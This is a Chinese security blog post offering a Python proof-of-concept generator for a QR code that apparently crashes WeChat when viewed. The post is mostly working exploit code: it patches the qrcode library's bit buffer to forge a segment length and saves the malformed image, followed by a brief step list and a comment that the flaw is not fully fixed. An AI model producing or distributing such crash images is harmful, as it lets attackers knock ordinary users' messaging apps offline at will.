探索网络安全新技术
攀登黑客技术最高峰

微信BUG:二维码崩溃漏洞工具(微信POC生成器)

昨晚传出一个微信0day漏洞,查看二维码图片微信就崩溃,”只能看一眼,不能看多,因为再看一眼就爆炸了,哈哈~”,话不多说,上代码。

微信BUG:二维码崩溃漏洞工具(微信POC生成器)-威武网安

安装qrcode

pip isntall qrcode

生成代码

import qrcode
from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE

def nvwu_put(self, num, length):
    if num == 0:
        num = 233  # 制造一个伪造的长度
    for i in range(length):
        self.put_bit(((num >> (length - i - 1)) & 1) == 1)

qrcode.util.BitBuffer.put = nvwu_put

def anquannvwu():
    qr = qrcode.QRCode(2, qrcode.constants.ERROR_CORRECT_M, mask_pattern=0)

    num_data = QRData('1145141', MODE_NUMBER)
    data = QRData(b'.', MODE_8BIT_BYTE)
    hack_data = QRData(b'', MODE_8BIT_BYTE)

    # 确保所有数据都适应这个版本的最大内容长度
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)

    # 添加一个零长度的数据,使得数据的长度为233
    qr.add_data(hack_data)

    img = qr.make_image()
    img.save("./poc1.png")

if __name__ == "__main__":
    anquannvwu()

代码解释

上面的代码做了以下工作:

[admonition]

1. 创建一个新的QR码,纠错等级为M,掩码模式为0。

2. 创建一个新的QR数据,字符串为’1145141’,模式为MODE_NUMBER。

3. 创建一个新的QR数据,字符串为’.’,模式为MODE_8BIT_BYTE。

4. 创建一个新的QR数据,字符串为空,模式为MODE_8BIT_BYTE。

[/admonition]

 

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《微信BUG:二维码崩溃漏洞工具(微信POC生成器)》
文章链接:https://www.wevul.com/578.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 1

  1. #1

    这洞现在还有 没完全修复 :dinosaur-ok:

    琳达9个月前 (05-20)回复

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册